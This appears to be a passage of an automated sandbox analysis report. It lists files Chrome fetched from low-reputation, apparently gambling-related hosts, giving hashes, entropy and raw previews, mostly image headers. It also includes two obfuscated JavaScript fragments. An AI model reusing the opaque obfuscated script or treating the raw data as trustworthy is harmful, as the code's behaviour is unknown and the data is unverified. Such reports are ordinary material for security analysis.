                                                                                                                                                          Preview:tZEkTJqSCi7LdbBGlJOnk19hFkJL4M6PWqyauaED4fxkuOUrWwFo9Phz0Macx50FIfdlyUQ26+j5AYtpHbotymbepiXbfI13KjdD/OhAZcidFbhlmtVQb1rLsA3Jg9QFLYSB7euGs/UcFfYutLhQJbIY//Lx/wMWlxdJ58ywdg2M46C1Sd2JR6RGmbbaY2YZqY95hweFpMnAq40LmrKR3amPeYcHhaTJwKuNC5qykd2pj3mHB4WkycCrjQuaspHdqY95hweFpMnAq40LmrKR3T53SvwfIiLfjdlSsaUJhuWRnmowBJBp6WUdIaVTQ9Tpgionp5cMD1SdWQsYcutjEZrnxNQeFd4pilPgSnuhqT0ZIHMepDN2WNK74BDKlMCohoH/x9yawHPhri20qneEk58161WJENAFf7ECw6UZosAbHV+UNl+kTFgaZ+vp6dhTSTb0xESt5Q7tRlD/RLtLVywsTgAevV+sJSAMw22hkDSB53UywT9obTbny6qRkYDydmSc2S75eCwELD1WxR0IzJJJrxBPQCLThyt+MuYRnTT30O3FJe5jgz+t7apyGecmrIzgLKRYPxteraOrQCGqEL+VCFY46DagTYhHEHbUIqOAESaVEZZno2o7tsc2gYrBLmv+ghNWgBfeZGPMvQYNvtam46q1jE01mYZ2xqYZS+eIdjV3Hd5zn6Rj6MAPRTm9LYHP82xdRnhEOT5JuvVaOsHH4EuqJQZ/rbqGXD3tcsIPvEI811nFRdu8hyCL28HhnJVmlil62iRRBCK+AUDOXNiBs0z9LkBpJ51hXisqL1MoyA65HTi+ppRkjGv4ILO1Q5+XqrNyox+rujVtsTTpK5c/DiGOKmwDMu5/vKzHdiGvpdll0JOg5T90BXEUH3DWpbW2W8cmkW0ZnPeQdd+sgBP1iqC3YJi+/tY2lgRn+aG7UXs9HLGCfHSlsIBJPSdkWhsz0PIqqt1EM69+++KXuCyOxa2RmfWpfAaQRKmn
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3508
                                                                                                                                                          Entropy (8bit):7.767566608756022
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:sZvnXTG8J3hbCMBW20E7AVy/Lsex+a8x3WSh58O38Y6D3VBDVwcqUNxRF2FjYigd:yi8vg20NVJa2WS1Q3bVZRFOvbQMP/g
                                                                                                                                                          MD5:B5EA33757612DF8E3D98530C2FEE8B3B
                                                                                                                                                          SHA1:50CE7CF915DC7994AFD21A97334A6C263E688520
                                                                                                                                                          SHA-256:4C8E771B39A80D2AC00B8DA71A2394B820C578B47F8229C48D99D7B6AE937C4F
                                                                                                                                                          SHA-512:07DE8365A3CE540BB0976C45C8C0EDD4411A5E964BCA1454D6759B20F9AD78438CFB358114BD4C6D18C08F91118501B97EB98A3ACB211ED58EF3C3AC0C5E5BD6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/game_hc.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:53516B0898A311EEA1CFA7198756FBA5" xmpMM:InstanceID="xmp.iid:53516B0798A311EEA1CFA7198756FBA5" xmp:CreatorTool="Adobe Photoshop 24.7 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D693D4A0432A11EEAFC7EAB4DF0F1F51" stRef:documentID="xmp.did:D693D4A1432A11EEAFC7EAB4DF0F1F51"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.P6....!IDATx..Wy..u.~...{gfggw..=...Zh.pF.i.(M.bPC<..1....B4.x..!V+D.. ..$..*...hK.-{.s...|....m.D...._..{.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4580
                                                                                                                                                          Entropy (8bit):7.832980484721029
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:dFnIhHYiQVAXFkQCfypbYuZleKHbe+AmCXtza+/IH9U6R:L/keY8uzHbe+gzz/EUS
                                                                                                                                                          MD5:D8E2826A22EB674F5EDC35E121535C4A
                                                                                                                                                          SHA1:89D5E073D3A7550D95B91EDEFAF1AC395B8920D3
                                                                                                                                                          SHA-256:113147DC50711D07B23D334D856CD006BFECFDA145E83F8F6A99AB5406B37051
                                                                                                                                                          SHA-512:FC15B98779594AB57C719451BA4EACA66B76A82FBE1679D49E6EE38431E83ED5F8D495988E171FB59AF9C3FE5AB46AEAE8250339692297410249DA64A415EBC0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/card_bs.png
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:825B408789F211EA965493ABF2EE9421" xmpMM:InstanceID="xmp.iid:825B408689F211EA965493ABF2EE9421" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:44a76a31-a741-df47-be85-17dd3e48eedf" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>"(.K....IDATx..[.tT.......d...!..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 635
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):431
                                                                                                                                                          Entropy (8bit):7.4934780132929495
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:XXWJdFuB29sE7jgQaTQIHqlBerth2wEK6wuO2Iu/:XXWJdFsDEQlrHWB2QrUbo
                                                                                                                                                          MD5:EE1F28F59BC095C075D29DCF5A3EE1E9
                                                                                                                                                          SHA1:073584A9DAB2F999BB3BC2B45837232A7182DED5
                                                                                                                                                          SHA-256:B916E0A30F5B07409434924174F16716C008C91182E82CED7438EFE2C9E5C5BA
                                                                                                                                                          SHA-512:47EBF70058592267F62627EC1A09B133C854DDDFCC2B41D7CF2C5506D1AA769656BBCD47FA78D19E744EBC997A7C08E9230EAF1F8654C8EC42965F8C60924D3C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:..........T..n.0...<..U...F.n...H..R.U......7.&f.AQ.6.m:.fF?....:.M..N....B....I.pr.,*...2(..6q..5.W6..B......*..6.bTU;...yj...L.g./...zgtSA.Pc..p6H..ha...w.p.F..M.>........N.U.../b[......O..)P....n.5NH.p.l..Y8..7...J.f..U...~[..9.G/zE...7.H......2.F/...*.<g1.[-y...n.o.........I.d.W..0lW.\.$7.L...f..%v..k>...).vX..8.n..Z!...U...j..u.".]E....P......>?+WUl...O.!.&.V..y.<'9...L.-N.#.....5.. ../...........bZ{...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (5240), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5240
                                                                                                                                                          Entropy (8bit):5.908883691605881
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:VtYTmga+5+vCfFXily4XY5jlsQKi4OPM5A/J1llffuh0nbfZbIlhx1c9:Vt2mx+5+vCkIB5jlsQV9lleh0nNbuK9
                                                                                                                                                          MD5:2550867ECD6E45B82BF66302F09ED65D
                                                                                                                                                          SHA1:87C249625C01798DCBBB1C048426277DFAC5CA12
                                                                                                                                                          SHA-256:1E16F61A53CDA8D3B89972D82E7CF124282F0673B1D5AC54699F63F5AFA5C813
                                                                                                                                                          SHA-512:9B95DBC6CEDDFCAB82DF4E56B51B855A987F1EE0B2DE298D249429B4A810E8729A1A8C90C559C95B26462CE005AA3674978895B65A0039D22465DCFDB254F12C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/ConversionBox.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAZlwF0AaAbwDMUBPFALgoFc0YAXAS3U1ZKgEoyAXxIAPAJIBGADYNmbTmm68S7AQCJGSEAAIkrAE7s2agNwB5MACsQbAHQATEBXZoQABX0oIIfa2qYoEjUAfWCQJABZFHtGKRA1cgA3KClGEDoAQgAGQT4TZP1tEABedkw1ABF7XGA1PhI0UttFEHqkUvKsmAgKOpJ9DrUIgBYKADE+qSbFfXqYQYrGAHoAJj6UQYA5AE0RMz77YsxFPkwhEgtrNkwUWwBbKAgAcRBWVh8kU+w1diQAGRQAHMXAk1FIgS4xPZQWAUlAWPEgjB0IkPgoAMoACxQtSRKLR6ChoORaFR+iQCkuoNYmPY+nsbigvmof1+rFBDxcrCgLlZelBIBEMEx8MBIDGUiggNBvwAKvpqG5JdQ1EQ+PUTmdhJcbKwbvdHhFGNyOOhPmdflicXQYLZLCQtKwoTbbOwHa8AEJwhEukC5cggNDvfRPKB3dJMFimk5kGm/V1IK3ATAZCT1ONIWwQZWy2n0xnM0PhzB8YToMYoGCaWRRhQl85i1i5ukMpl+WGSn2R+RcVgCAraKDFDMmdgUTASYrD2mZwXC0XiyWAgA+y4zCfliuVfHX2ag1Gb+bb1CLIBLJhAUi0ZAH7GnvxIJUzjgoUFirFsAFUOFJbI3D/YULcH+YYgCQH5+N4GrFEIJhoNgEHUN4RDDiB4b5Ey2gDM+ThvlIH4RDyQZEX+ryEVyRFAWgeRjpgv5QK6LCpI4SDcDOBoUbybIkJsjB3GAPiYLM6q7jmeatoWoHnpe14DvM9G2M4aD2Gx8ZxkezJ8jw3bRtwAj6K8jD6Gg2gfuwhzFCAABkVkZGZSAAILGiguQmDAAD8qmZupEl+FCxS2uZ4HsT5mygQFzSgSoCZJimWRtA4uHvrYDkQOw6I+IkRggKRTbiQWfiflo+hep2MBnuuPkFdQUJ8LYNKB
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 265 x 110, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):16474
                                                                                                                                                          Entropy (8bit):7.970106115109003
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:5EGH0JZY6Q/NzJ/fyKc2afJWj9EBJelsOMv8AF1NVKCcOdFY:qGYZY6QXE2afGEBQlwv86rFcOdFY
                                                                                                                                                          MD5:B3ED0E887153AD39F31665193A09BB2B
                                                                                                                                                          SHA1:E34BF3F4FA7329CA34C22268DA5E2060F6BBF27F
                                                                                                                                                          SHA-256:5E2F0DB79BB82D6670C7DA79E4D0FDEE6C5F8C157E09A06457905F0B8FAE6228
                                                                                                                                                          SHA-512:A92337C516873075BA64251CEA8C641AB1A9E14B521CE732C5E48986569E893773C6047D395FA2ECFDC110796FBE2CE4234B350183DA63B8D595DAC3559DE87C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/125/games/games_4.png
                                                                                                                                                          Preview:.PNG........IHDR.......n.....4..2....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8c9fd8e0-91eb-452e-a203-93073bbf43ca" xmpMM:DocumentID="xmp.did:0ECC3E6F1E3011EEA737E951EC38508F" xmpMM:InstanceID="xmp.iid:0ECC3E6E1E3011EEA737E951EC38508F" xmp:CreatorTool="Adobe Photoshop 24.6 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:70622823-9e5f-4371-a409-006c11eaa715" stRef:documentID="adobe:docid:photoshop:a3e70f38-4f4f-7e48-94ca-895af37f29fd"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..T#..<jIDATx..}.|T.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi1961.hydqef.com/ocs/cc.png?1717972895188
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1595
                                                                                                                                                          Entropy (8bit):7.80211587847677
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:PsTnNI/4XbfZbgf6kZ89ZQrPJLQ5p1Lmz:PsTy/4Xjtgfb8mJLG1Lmz
                                                                                                                                                          MD5:BC449420471477CBBB196E5CB76B52E5
                                                                                                                                                          SHA1:953D19441965501253BFE9EB371BE7D0487511A6
                                                                                                                                                          SHA-256:50B47B136035C090FCE8784FE6BBA6D18152DD6E9177BE6B754048E9D3B80922
                                                                                                                                                          SHA-512:9E8A0C689589BC3AF9F333DBD77667A5FC6E7C3C4230E7F85AB0E3F201D16F2A1C7FAD8D768B8C4396506862D4429384BE6DD5306F0B0D2D5CBB864A5B654115
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/fish_tp-8.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE......,++wW..v.y...ZR4..{A:!.......T.fDpT+..W7..p je^IH8.}{q?.f;....|\;:($..e..[I'...{HP..u.oE.....m.u.X%...l<A>*....;..............._Z2..S(...}....2$...P......h.........%%%oUD=;;.f%.........JMN..B.f:..6.'..........i...........b.._..F.y<|g:825..+.%.W.C/.....Y.I...E...bz{.h..b.a.u_..]UZZ.;V..L.mH.aED/C..@..=Z94..2.0.....*..*.*.0*RC)k?).(.n$.........[..j..,..W..G.......2.....s....N..........#..#m........J.....m............................~W.{..hX_e..`.._..].Y..Xu.RZ.Q..O..LhPL.H.<E.?..<dh9!!8l.5}X4BR3.x*.k)..'.x".!....-....-$...........[....(...+.z).....4.c.....w....................&..x..x6............d&......_...=z........z{.xsSu.'u..t/3i?@eH.a.1a..`m.W4.U.oR:1O.[HYLHn.?.=."4I.1.q,|Y'...l.........-.g...".....<tRNS...Mo..(......`V......zzojK96'.......................pmf>:P.......IDAT(.b ............Xd...8.I...iJ.h.8k`7.t.....[.t.1%et..~9.'....Q.].K@R........mZ..."+2#..y|.Wr.@...9.xf1j#..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2084
                                                                                                                                                          Entropy (8bit):7.828276105941885
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:mMa2IDTMJvQ+YXFHesNZ1OA6u9f9X1DUcMfnax1bFIEt44:zcAvQ+YXF+sNZ1OAp9X1Afnc1Zh5
                                                                                                                                                          MD5:6D4ED4AD342225EE6B8505E3E4A47199
                                                                                                                                                          SHA1:1BEDE3976E1DAA3FA605D3073651FF6B32CDD068
                                                                                                                                                          SHA-256:35E1685E841B9F019C86E7DBEC2919365D2D51B5FA9FD85B9F4283FFDB3289CF
                                                                                                                                                          SHA-512:4D4B311E569D6B9AEA582DE128C4410B1D6ADA9DA5E6BA844AFC68007561C4513302AE194B929F62C725CBBB80F4C64048542EF547AF9F8BE84DA4FD01952778
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/card_tp.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME......)20\S....IDATH..k.]U.....>.{....)R.T..".... b$..0..!.H..G.$..1.0...THH4...%$b.R.......Ph...t..s.Z.8..BK.JN.9...o=.........E.'....B..WU<.k.-....}O.r..{.A#B.j..@e...(P.....G.x..}@........p..K..8.*..r9Q. .?Fqm..x^..Ce.....G.=...F.MO-.....:A~.......f ......DEc.DE..`...fz67......<.Nu..I...m)..D.I^.Vk8.hF....@..).)..4(Y...B.....i."R.......k..\..G.......E.....Q4..1'...p.w...`(t.d...-......M44Q.#...Zl.[.....q..fhm..m.k....T.......[l.vV.B#.y.i.z.Q.....p..=.C..T45QHES*.I.Z.c.^X.};o..3.3....?_V.-...^.v..[Q.8...G..h..`-..-\t...p.Gp.@..A..G.k..#.ymz9S.()Y>..1.G.^....VUm..Pq.U[Ys..:1.\7....C..\v.Ab..N....y[.._.ff!..JTa$.g$.....<0.Icfl.$[.2B.4.#:..Wl..S....N....7K><I*..... .6<u:O<}&..R..7~q/k....O,y...=.9..#U..$_!.^......?{.3.3....7..5O.....4..9..Y.@."].{.5yf|9]=.......s.R.:.G ...;t;...lE$..B5......4.h6...9l~........q....wf..n... ..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):78520
                                                                                                                                                          Entropy (8bit):5.976952541566771
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:CxFGh3JJhk5xGvgaxsEYzSZGN59wpSzYGM1f3JSUWmEv+pNxgS1reo:2FGh3KKgaYSZGGoRM1fZWWpbb17
                                                                                                                                                          MD5:445B75CF485F28FC7773E43EB14173D1
                                                                                                                                                          SHA1:26541B93E53A77EB0250358FB4E9E7BB8C20028F
                                                                                                                                                          SHA-256:06465047AFD1AA5753C6BBA50BAD2D1B46680A783614FF38ED931F674E6A02E6
                                                                                                                                                          SHA-512:494D43789F5F6A0B42DD34C0690DD54FE4B7D757F6A51386C8C8646583766CA1FA8B2F2F4684EAB32CC289E83746D06FF709AE562AE2A2892F25F6BAD4D05B1F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/t4043.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAJnwHYAafATgAYBdEgbwCIBqADiYGYGAuAMwFc0MAC4BLdJiEkQJEQEo6ANygAnAAQoA3CgC8/QaPHyGfJCFVIhykcIYalaySG100UALYguDAF4ALAPoAwgByDCQeSEhQAOYgSFx0UDxCIMq8AsJiaBJS8sogQnzKaAyqzEJMDICj+oDeGYAU6swg2DSVgNJygHAqDAC+JFAANhC+UP4AJlBIvun6WRJ5BUUlZUwVDIC/AYD4moCgyoDUKoDq2oCz1oAOpru7gGTegDD/m4A3RoAsHoAZRoDvyoCADIDQcoBISoD9ft29A0P+aHw3FNMuIhHNCsVVCtVIAr5VWOwOxzOADpvv1BsMkNAYHFgQZsmC6PkIYtypVYfC9vszpcroAvL0APBaonrooZ4maE4kLUpk0pwhHU07MkhgEA8FD5dmg3JE+bFHnLcm1BpMJotUqtQCySsLRUJQCA0FKCTKufKltDlY1mtRyVbcDaGK1AC+pwpg6B4ImUHhGRpyIHB3PN5MAsHKrQAxKlb1YBOZUAsonCsYpfy6/WGvQg43+2UkhUrS2q62VCP5+1tF3fBMgfzir1QIS+xwBs285UqtUOhmAeH1ALRy8ZAMBEbn69ZlChQIhGqko2mnIAAZLPME5sNRZHYVKoRNo2xpTWhVKPx5Pp9oRPPMJuGAAqBiyEg5pU1QD0ZsdACFugBgAwAochtALvygE1XZiYFeDDHiIAD8DDcHI5KALLygDwOoc8YiNEIhCPEab4n6jakoqpS1M+uznB+gB9PoAdh6AAxKSxtpUhzlgOBpIFkaEZBhDZZoGzZPpRBalIA8wqAAS+FF2g6qj8cKICDiIfT1lh964U+gCQ5oAEqYvoAdQmAI3eYkAB51uhHIyUGcmPkpL6AOGmgBvcsKA4xJ4umgvpvKqHhgB/aoA4k6WamzF6WxTY4Y5T6AABygBUckpgA8CpZE
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):13569
                                                                                                                                                          Entropy (8bit):7.9542641928161375
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:wd2YWEpHwmCOHVTe0wschjx0NQgy3cWShvmHA:wdNF9BCOHVTeDRx0egysXvmg
                                                                                                                                                          MD5:61328DC3D6BBA41D86D4852CDBD80A06
                                                                                                                                                          SHA1:D9FD0CAEDF4CE0B4FD097AEFB3B08FE320F53458
                                                                                                                                                          SHA-256:01160ABD9D13162B1C0E91A286A4A6B3DB263DBFBC96F4A708965DA78C03C471
                                                                                                                                                          SHA-512:ADE51B73B14B4F58240347F36C241418B935E922276ECD1AC059B15FBA73E5CA7A4AB71B9C36DC90A9AADEC46E72AC0E718A770809D3ABB76554D7CA59ADA348
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:C17C32078D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:C17C32068D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17388
                                                                                                                                                          Entropy (8bit):2.7010799008089723
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:wStYkEWmfURrBI5SxNXrNGDmGvsc5ZpSNJIsUviTrFTAOx2:wSWk655Q5SwG5viTJNx2
                                                                                                                                                          MD5:CE5E34D129CC6D05C61DA19D2622E53B
                                                                                                                                                          SHA1:6E923FD81192EED13C656E4F2C8F18F04A2FF280
                                                                                                                                                          SHA-256:22B24ADFDF564E096A0383E268D32C0634B4B05E1B324CAFF12796125D782237
                                                                                                                                                          SHA-512:4FD3A3662661270B32BAF0840D81BD360F29BEDDD683D88D9C1B2D03A62FEE22CB84B00352D855A239DFCC9D9F99A2617FC445CCC85B70C0B8BCABC1B972CECE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/sport_3sing.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs...............=.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpRights:Marked>False</xmpRights:Marked>. <xmpMM:OriginalDocumentID>uui
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (760), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):760
                                                                                                                                                          Entropy (8bit):5.710786358990766
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:4chWvnTeh+TJzRicmXZStxj9Xz9cudnPmvRoOBCXoI+huRluN6rL3kSjq31JhWkG:VGaMficcMxj9Xz9c6nPaTBmMhuGNqLUg
